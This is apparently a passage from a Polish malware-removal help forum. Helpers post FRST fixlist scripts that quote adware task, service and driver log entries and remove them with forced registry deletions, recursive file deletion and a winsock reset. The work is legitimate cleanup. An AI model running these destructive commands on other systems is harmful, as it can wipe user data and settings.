-> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll No File Toolbar: HKLM - No Name - {bd0c8f87-2da0-4449-a726-b978ae8db32c} - No File DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab DPF: {CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab FF DefaultSearchUrl: https://www.google.com/search/?trackid=sp-006 FF SearchEngineOrder.1: Google (avast) FF SelectedSearchEngine: Google (avast) FF Homepage: https://www.google.com/?trackid=sp-006 FF Keyword.URL: https://www.google.com/search/?trackid=sp-006 FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.0.61118.0\npctrl.dll No File FF HKLM\...\Firefox\Extensions: [jqs@sun.com] - C:\Program Files\Java\jre6\lib\deploy\jqs\ff FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension CHR Extension: (Bflix extension) - C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Extensions\jlfihafpijfdgmojeeigcldgchhojpfp [2012-01-14] CHR HKLM\...\Chrome\Extension: [jlfihafpijfdgmojeeigcldgchhojpfp] - C:\Program Files\BFlix\BFlix.crx [2011-12-19] R1 avgtp; C:\WINDOWS\system32\drivers\avgtpx86.sys [42784 2014-08-12] (AVG Technologies) S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X] S3 massfilter_lte; \??\C:\WINDOWS\system32\drivers\massfilter_lte.sys [X] S3 zgdcat; system32\DRIVERS\zgdcat.sys [X] S3 zgdcdiag; system32\DRIVERS\zgdcdiag.sys [X] S3 zgdcmdm; system32\DRIVERS\zgdcmdm.sys [X] S3 zgdcnet; system32\DRIVERS\zgdcnet.sys [X] S3 zgdcnmea; system32\DRIVERS\zgdcnmea.sys [X] C:\WINDOWS\system32\drivers\avgtpx86.sys C:\Documents and Settings\All Users\Dane aplikacji\{7D14E36A-889F-4FDA-8B78-2423FB17A4D3} C:\Documents and Settings\All Users\Dane aplikacji\AVAST Software C:\Documents and Settings\All Users\Dane aplikacji\InstallMate C:\Documents and Settings\All Users\Dane aplikacji\Norton C:\Documents and Settings\All Users\Dane aplikacji\Spybot - Search & Destroy C:\Documents and Settings\LocalService\Dane aplikacji\McAfee C:\Documents and Settings\NetworkService\Dane aplikacji\McAfee C:\Documents and Settings\q\Dane aplikacji\~uTorrentPartFile_4985C65.dat C:\Documents and Settings\q\Dane aplikacji\eXcEl3rator.txt C:\Documents and Settings\q\Dane aplikacji\Metric - Synthetica.log C:\Documents and Settings\q\Dane aplikacji\njyhik9iaa C:\Documents and Settings\q\Dane aplikacji\nyjuikoitg C:\Documents and Settings\q\Dane aplikacji\AVAST Software C:\Documents and Settings\q\Dane aplikacji\Ieie C:\Documents and Settings\q\Dane aplikacji\MsDtc C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\*.dll C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\setup.exe C:\Documents and Settings\q\Ustawienia lokalne\Dane aplikacji\jemaka C:\Program Files\DDownTango5aToolbar C:\Program Files\Mozilla Firefox\plugins C:\Program Files\Spybot - Search & Destroy 2 C:\WINDOWS\zyjcxd.hcr Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f CMD: attrib -r -h -s C:\HELP_DECRYPT.* /s CMD: del /q /s C:\HELP_DECRYPT.* EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Przejdź w Tryb awaryjny Windows (loguj się na swoje konto q, a nie wbudowanego Administratora). Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart, opuść Tryb awaryjny. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Scan, zaznacz pola Addition i Shortcut, by powstały trzy logi. Dołącz też plik fixlog.txt.

Adware przekonwertowało całą przeglądarkę z wersji stabilnej do developerskiej i jest konieczna całkowita reinstalacja od zera. Do wykonania: 1. Z Google Chrome wyeksportuj tylko zakładki, następnie zresetuj synchronizację (o ile włączona): KLIK. Odinstaluj przeglądarkę, przy deinstalacji wbierz opcję Usuń także dane przeglądarki. Na razie nie instaluj ponownie przeglądarki. 2. Odinstaluj także stare wersje: Adobe AIR, Java 7 Update 67. 3. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X] Startup: C:\Users\Wojciech\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Download O.S.T.R - Podrż Zwana Życiem _2015_ [mp3@320kbps] Torrent - KickassTorrents.lnkŻyciem _2015_ [mp3@320kbps] Torrent - KickassTorrents.exe (No File) Task: {88D20071-A493-4FF5-8AAE-8C9A24471C2D} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe Task: C:\Windows\Tasks\0215avUpdateInfo.job => C:\ProgramData\Avg_Update_0215av\0215av_AVG-Secure-Search-Update.exe Task: C:\Windows\Tasks\0614aUpdateInfo.job => C:\ProgramData\Avg_Update_0614a\0614a_AVG-Secure-Search-Update.exe Task: C:\Windows\Tasks\0814avUpdateInfo.job => C:\ProgramData\Avg_Update_0814av\0814av_AVG-Secure-Search-Update.exe Task: C:\Windows\Tasks\1114avUpdateInfo.job => C:\ProgramData\Avg_Update_1114av\1114av_AVG-Secure-Search-Update.exe Task: C:\Windows\Tasks\1214avUpdateInfo.job => C:\ProgramData\Avg_Update_1214av\1214av_AVG-Secure-Search-Update.exe Task: C:\Windows\Tasks\AVG_REG_0214c.job => C:\ProgramData\AVG 0214c Campaign\AVG-Secure-Search-Update-0214c.exe Task: C:\Windows\Tasks\AVG_SYS_TASK_DELETE.job => C:\ProgramData\AVG 0214c Campaign\AVG-Secure-Search-Update-0214c.exe ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File ShortcutWithArgument: C:\Users\Wojciech\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.sweet-page.com/?type=sc&ts=1391605310&from=cor&uid=ST9500325AS_S2W8WGT5 ShortcutWithArgument: C:\Users\Wojciech\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.sweet-page.com/?type=sc&ts=1391605310&from=cor&uid=ST9500325AS_S2W8WGT5 HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKU\S-1-5-21-4225948802-2122742746-3075298040-1001\Software\Microsoft\Internet Explorer\Main,Start Page = http://here.com SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-page.com/web/?type=ds&ts=1391605310&from=cor&uid=ST9500325AS_S2W8WGT5&q={searchTerms} StartMenuInternet: IEXPLORE.EXE - iexplore.exe C:\Program Files\Google C:\Program Files (x86)\Google C:\ProgramData\{25d3b77b-69e6-e5db-25d3-3b77b69edded} C:\ProgramData\8700427414304003993 C:\ProgramData\lbgkomjhaeakdlanjamgonacemjokjhe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Update Management Tool.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hearthstone C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kolekcja Klasyki C:\Users\Wojciech\AppData\Local\Google C:\Users\Wojciech\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line Folder: C:\Windows\system32\GroupPolicy Folder: C:\Windows\SysWOW64\GroupPolicy Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Aff Packages" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.

YAC (Yet Another Cleaner) to szkodliwy program wątpliwej reputacji: KLIK. Nie instaluj już więcej tego śmiecia! W systemie jest adware Assist Point, które zostało nabyte z serwisu dobreprogramy.pl podczas pobierania softu Sony przy udziale szkodliwego "Asystenta pobierania": KLIK. Do przeprowadzenia następujące działania: 1. Przez Panel sterowania odinstaluj stare wersje i zbędniki: Adobe AIR, Adobe Flash Player 16 ActiveX, Adobe Flash Player 16 NPAPI, Java 7 Update 51, McAfee Security Scan Plus, Norton Online Backup, OpenOffice.org 3.3, YAC(Yet Another Cleaner!). 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://do-search.com/web/?type=ds&ts=1428836097&from=cor&uid=ST320LM000XHM321HI_S26VJ9KC406164&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://do-search.com/web/?type=ds&ts=1428836097&from=cor&uid=ST320LM000XHM321HI_S26VJ9KC406164&q={searchTerms} SearchScopes: HKU\S-1-5-21-885473801-1135821649-2530607942-1001 -> {8EEAC88A-079B-4b2c-80C1-7836F79EB40A} URL = http://pl.search.yahoo.com/search?p={searchTerms}&fr=chr-comodo BHO-x32: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File BHO-x32: No Name -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> No File BHO-x32: Assist Point -> {dc727a8c-7582-483c-a1c2-2b885f099bb5} -> C:\Program Files (x86)\Assist Point\Extensions\dc727a8c-7582-483c-a1c2-2b885f099bb5.dll [2015-04-12] () HKU\S-1-5-21-885473801-1135821649-2530607942-1001\...\Run: [AdobeBridge] => [X] ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File FF HKLM-x32\...\Firefox\Extensions: [ff-bmboc@bytemobile.com] - C:\Program Files\T-Mobile\InternetManager_H\OCx64\addon Task: {0AFE91E0-B1DD-4508-938E-4B93E9B52F11} - \BitGuard No Task File Task: {23F45298-03B6-4908-A260-4530293DD6AA} - \AdobeFlashPlayerUpdate No Task File Task: {4A443217-EF95-4B8C-AAE8-A36D174F6D13} - System32\Tasks\{BB9AADC2-883A-4AE4-BE14-9FC652CB7112} => pcalua.exe -a C:\Users\Kasia\Downloads\385-INST-WIN7-A.EXE -d "C:\Program Files (x86)\Mozilla Firefox" Task: {8763BD22-3E09-4477-83E0-073F57FDA939} - \AdobeFlashPlayerUpdate 2 No Task File Task: {9DC8BCE5-24E5-4C85-B1DD-6620E4C13F81} - \EPUpdater No Task File Task: {B884943C-CD44-45CA-975A-38A2283400F1} - System32\Tasks\{FD23790B-E0A8-49DD-A9D4-68ABA3FD4448} => Firefox.exe http://ui.skype.com/ui/0/6.1.0.129.272/en/abandoninstall?page=tsProgressBar S1 epyqqjlr; \??\C:\windows\system32\drivers\epyqqjlr.sys [X] S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X] S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X] S3 huawei_cdcacm; system32\DRIVERS\ew_jucdcacm.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 huawei_ext_ctrl; system32\DRIVERS\ew_juextctrl.sys [X] S3 huawei_wwanecm; system32\DRIVERS\ew_juwwanecm.sys [X] S1 qwhxjyus; \??\C:\windows\system32\drivers\qwhxjyus.sys [X] HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcmscsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service" C:\Program Files (x86)\Assist Point C:\Program Files (x86)\GUT58D4.tmp C:\Program Files (x86)\Mozilla Firefox\extensions C:\Program Files (x86)\Mozilla Firefox\plugins C:\ProgramData\{*}.log C:\ProgramData\c716fd70-872c-4aaa-a07f-e248365d7f56 C:\Users\Kasia\Downloads\*(*)-dp*.exe C:\Users\Kasia\Pictures\ControlCenter3\Scan\różne\ImageShack Uploader.lnk Folder: C:\Program Files (x86)\Mozilla Firefox Reg: reg delete HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I /f Reg: reg delete HKCU\Software\dobreprogramy /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4F524A2D-5637-4300-76A7-A758B70C0F01} /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox z adware: menu Historia > Wyczyść historię przeglądania menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. 4. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

W Harmonogramie zadań uruchamiają się szkodniki: Task: {A57136FB-14AA-475C-A6D9-90575A2FB5F6} - System32\Tasks\Update\cryptex => C:\Users\Krzycho\AppData\Local\Temp\ariana.exe [2015-04-08] () Task: {CCDD0FAA-E2D9-43E1-AD37-33F3945F02DC} - System32\Tasks\Update\Google Update => Chrome.exe Znaleziska AdwCleaner w cache HTML5 Local Storage nie powiązane, AdwCleaner nie widzi tego wcale. Do wdrożenia następujące akcje: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {A57136FB-14AA-475C-A6D9-90575A2FB5F6} - System32\Tasks\Update\cryptex => C:\Users\Krzycho\AppData\Local\Temp\ariana.exe [2015-04-08] () Task: {CCDD0FAA-E2D9-43E1-AD37-33F3945F02DC} - System32\Tasks\Update\Google Update => Chrome.exe HKU\S-1-5-21-2253125196-3734906773-2982781718-1000\...\Run: [LightShot] => C:\Users\Krzycho\AppData\Local\Skillbrains\lightshot\Lightshot.exe C:\Program Files (x86)\Temp C:\Users\Krzycho\AppData\Roaming\EF611A56-1B3A-4EC8-9C3F-71D219768C5E C:\Users\Krzycho\AppData\Roaming\Imminent C:\Windows\system32\*.tmp C:\Windows\System32\Tasks\Update DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Update Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut), zaznacz ponownie pole Addition. Dołącz też plik fixlog.txt.

Sprecyzuj co to znaczy "prawie w ogóle nie chodzi". W raporcie brak oznak masowej czynnej infekcji, ale owszem widać, że adware znów było instalowane - to nie są automatyczne instalacje z powietrza, to były zatwierdzone przez Ciebie ręcznie instalacje z jakiegoś "downloadera" i tu wątpliwe by antywirus zdziałał cuda: 2015-04-05 11:17 - 2015-04-05 20:06 - 00000000 ____D () C:\Program Files (x86)\ShopperPro 2015-04-05 11:17 - 2015-04-05 17:22 - 00000000 ____D () C:\Program Files (x86)\globalUpdate 2015-04-05 11:17 - 2015-04-05 11:19 - 00000000 ____D () C:\Program Files (x86)\YouTube Accelerator 2015-04-05 11:17 - 2015-04-05 11:17 - 00003520 _____ () C:\windows\System32\Tasks\Inst_Rep 2015-04-05 11:17 - 2015-04-05 11:17 - 00000000 ____D () C:\Users\Public\Documents\YTAHelper 2015-04-05 11:17 - 2015-04-05 11:17 - 00000000 ____D () C:\Users\Public\Documents\ShopperPro 2015-04-05 11:17 - 2015-04-05 11:17 - 00000000 ____D () C:\Users\Public\Documents\GOOBZO 2015-04-05 11:17 - 2015-04-05 11:17 - 00000000 ____D () C:\Users\Kuba\AppData\Local\globalUpdate 2015-04-05 11:17 - 2015-04-05 11:17 - 00000000 ____D () C:\Users\Kuba\AppData\Local\CrashRpt 2015-04-05 11:09 - 2015-04-05 11:10 - 00000000 ____D () C:\Users\Kuba\AppData\Local\Gameo 2015-04-05 11:09 - 2015-04-05 11:09 - 01709792 _____ (Disc Soft Ltd.) C:\Users\Kuba\Downloads\DAEMON Tools Lite 5.0.1.0407 [1].exe 2015-04-05 11:09 - 2015-04-05 11:09 - 00000172 _____ () C:\Users\Kuba\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url 2015-04-05 11:08 - 2015-04-05 11:08 - 00713112 _____ (Program ) C:\Users\Kuba\Downloads\DAEMON Tools Lite 5.0.1.0407.exe 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {E6EF3D5E-5439-4067-BEE0-55962F36C230} - System32\Tasks\Inst_Rep => C:\Users\Kuba\AppData\Local\Installer\Install_20089\DCytaiesmt_smtyc_setup.exe [2015-04-05] () C:\Program Files (x86)\globalUpdate C:\Program Files (x86)\Mozilla Firefox C:\Program Files (x86)\ShopperPro C:\Program Files (x86)\YouTube Accelerator C:\ProgramData\Temp C:\Users\Kuba\AppData\Local\CrashRpt C:\Users\Kuba\AppData\Local\Gameo C:\Users\Kuba\AppData\Local\globalUpdate C:\Users\Kuba\AppData\Local\Installer C:\Users\Kuba\AppData\Local\Mozilla C:\Users\Kuba\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url C:\Users\Kuba\AppData\Roaming\Mozilla C:\Users\Public\Documents\GOOBZO C:\Users\Public\Documents\ShopperPro C:\Users\Public\Documents\YTAHelper CMD: netsh winsock reset EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Był uruchamiany GMER. Sprawdź transfer dysku w ustępie Skutki uboczne skanu GMER (dyski w trybie IDE, głównie system XP): KLIK. Następnie do wykonania podane wcześniej czynności, tylko w skrypcie FRST dodaj dwie extra komendy sprawdzania folderów Firefox i Opera: CloseProcesses: CreateRestorePoint: S2 globalUpdate; C:\Program Files\globalUpdate\Update\GoogleUpdate.exe [68608 2014-07-27] (globalUpdate) [File not signed] S3 globalUpdatem; C:\Program Files\globalUpdate\Update\GoogleUpdate.exe [68608 2014-07-27] (globalUpdate) [File not signed] Task: C:\WINDOWS\Tasks\6ec8ff1e-05c9-48a8-a914-abd17f5ec8f1-1.job => C:\Program Files\Go HD\Go HD-codedownloader.exeu/wJPTWBVa /AeTvrfwG=task /gAQAOY='Go HD' /iRkakd=62180 /vYltK='001005' /CmGvL='verticals-shopping,intext,pops,ads' /rDETE='0' /bAXssOOFW=11FA2FE9A49D411AAAC9B3D35A8A2E0FIE /wsKLiwboh=42d8197efbddc8783998b2e19f9e6de6 /xMdsCRdY=1_34_07_01 /NnIclmk=1.34.7.1 /hsMDYJ=1406465265 /yFnjDFEZO=http:/stats.infodatacloud.com /SZCYiQi=http:/errors.infodatacloud.com /YLMRn=http:/js.infodatacloud.com /FiGoiP=opera /hRweu='Go HD' /lElCwfx=http:/js.clientdemocloud.com /tzhHt /teJhlb='{asw:[67108866, -2147483580, 1024]}' /VrLZe='http:/update.infodatacloud.com/ie_code_agent_updates/{CAMP_ID}/update.jso Task: C:\WINDOWS\Tasks\6ec8ff1e-05c9-48a8-a914-abd17f5ec8f1-11.job => C:\Program Files\Go HD\6ec8ff1e-05c9-48a8-a914-abd17f5ec8f1-11.exe Task: C:\WINDOWS\Tasks\6ec8ff1e-05c9-48a8-a914-abd17f5ec8f1-2.job => C:\Program Files\Go HD\6ec8ff1e-05c9-48a8-a914-abd17f5ec8f1-2.exeű/ObJNSqL /gAQAOY='Go HD' /iRkakd=62180 /vYltK='001005' /CmGvL='verticals-shopping,intext,pops,ads' /rDETE='0' /bAXssOOFW=11FA2FE9A49D411AAAC9B3D35A8A2E0FIE /wsKLiwboh=42d8197efbddc8783998b2e19f9e6de6 /xMdsCRdY=1_34_07_01 /hsMDYJ=1406465265 /yFnjDFEZO=http:/stats.infodatacloud.com /SZCYiQi=http:/errors.infodatacloud.com /HTPGGFPS=11111111-1111-1111-1111-110611211180 /FiGoiP=opera /tzhHt /VrLZe='http:/update.infodatacloud.com/ie_enable_agent_updates/{CAMP_ID}/update.jso Task: C:\WINDOWS\Tasks\6ec8ff1e-05c9-48a8-a914-abd17f5ec8f1-4.job => C:\Program Files\Go HD\6ec8ff1e-05c9-48a8-a914-abd17f5ec8f1-4.exe=/PVteWFCNX /gAQAOY='Go HD' /uHekwvYT C:\Program Files\Go HD\6ec8ff1e-05c9-48a8-a914-abd17f5ec8f1.xpi' /iRkakd=62180 /vYltK='001005' /CmGvL='verticals-shopping,intext,pops,ads' /rDETE='0' /bAXssOOFW=11FA2FE9A49D411AAAC9B3D35A8A2E0FIE /wsKLiwboh=42d8197efbddc8783998b2e19f9e6de6 /xMdsCRdY=1_34_07_01 /NnIclmk=1.34.7.1 /hsMDYJ=1406465265 /yFnjDFEZO=http:/stats.infodatacloud.com /SZCYiQi=http:/errors.infodatacloud.com /nxXnahUI=300 /CPNOgP=sonnypenn@aol.com /XYjoEfN=0.95 /fgsZuMYq=asonnypennaolcom62180 /sJrxRJg=https:/w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/62180.rdf /VGWLKhePV='Go HD' /bECZhW='HD' /qMXVDGGkH='InstallMoon' /FiGoiP=opera /teJhlb='{asw:[67108866, -2147483580, 1024]}' /tzhHt /aPKlRJboZ /wVuHpqjsD /VrLZe='http:/update.infodatacloud.com/ff_agent_updates/{CAMP_ID}/update.jso Task: C:\WINDOWS\Tasks\6ec8ff1e-05c9-48a8-a914-abd17f5ec8f1-5.job => C:\Program Files\Go HD\6ec8ff1e-05c9-48a8-a914-abd17f5ec8f1-5.exe*/Omivbbo /gAQAOY='Go HD' /iRkakd=62180 /vYltK='001005' /CmGvL='verticals-shopping,intext,pops,ads' /rDETE='0' /bAXssOOFW=11FA2FE9A49D411AAAC9B3D35A8A2E0FIE /wsKLiwboh=42d8197efbddc8783998b2e19f9e6de6 /xMdsCRdY=1_34_07_01 /hsMDYJ=1406465265 /yFnjDFEZO=http:/stats.infodatacloud.com /SZCYiQi=http:/errors.infodatacloud.com /pEZfO=http:/ipgeoapi.com/ /ZcKbO=http:/update.infodatacloud.com /KQRCDih=2 /YGAxzBN=http:/logs.infodatacloud.com /VrLZe='http:/update.infodatacloud.com/updater_agent_updates/{CAMP_ID}/update.jso Task: C:\WINDOWS\Tasks\fun_coupons_notification_service.job => C:\Documents and Settings\Administrator\Ustawienia lokalne\Dane aplikacji\fun coupons\fun_coupons_notification_service.exeç/url='http:/cdn.selectbestopt.com/notf_sys/index.html' /crregname='fun coupons' /appid='73143' /srcid='2913' /bic='d5c475400c33ffeeeb86cfdf3244929c' /verifier='9e39fe357b0904cdc6cf94be126e2af6' /installerversion='1.50.3.10' /statsdomain='http:/stats.buildomserv.com/data.gif?' /errorsdomain='http:/stats.buildomserv.com/data.gif?' /monetizationdomain='http:/logs.buildomserv.com/monetization.gif?' /installationtime='1427979308' /runfrom='task' /brwtype='notbg' /postponedhours='6'.Adm Task: C:\WINDOWS\Tasks\fun_coupons_updating_service.job => C:\Documents and Settings\Administrator\Ustawienia lokalne\Dane aplikacji\fun coupons\fun_coupons_updating_service.exe¬ /campid=2913 /verid=1 /url=http:/cdn.buildomserv.com/txt/@CAMPID@/@VER@/file.txt /appid=73143 /taskname=fun_coupons_updating_service /funurl=http:/stats.buildomserv.com Task: C:\WINDOWS\Tasks\globalUpdateUpdateTaskMachineCore.job => C:\Program Files\globalUpdate\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\globalUpdateUpdateTaskMachineUA.job => C:\Program Files\globalUpdate\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\quiz_games_notification_service.job => C:\Documents and Settings\Administrator\Ustawienia lokalne\Dane aplikacji\quiz games\quiz_games_notification_service.exeć/url='http:/cdn.selectbestopt.com/notf_sys/index.html' /crregname='quiz games' /appid='73143' /srcid='2913' /bic='d5c475400c33ffeeeb86cfdf3244929c' /verifier='9e39fe357b0904cdc6cf94be126e2af6' /installerversion='1.50.3.10' /statsdomain='http:/stats.buildomserv.com/data.gif?' /errorsdomain='http:/stats.buildomserv.com/data.gif?' /monetizationdomain='http:/logs.buildomserv.com/monetization.gif?' /installationtime='1428000839' /runfrom='task' /brwtype='notbg' /postponedhours='6'.Adm Task: C:\WINDOWS\Tasks\quiz_games_updating_service.job => C:\Documents and Settings\Administrator\Ustawienia lokalne\Dane aplikacji\quiz games\quiz_games_updating_service.exe« /campid=2913 /verid=1 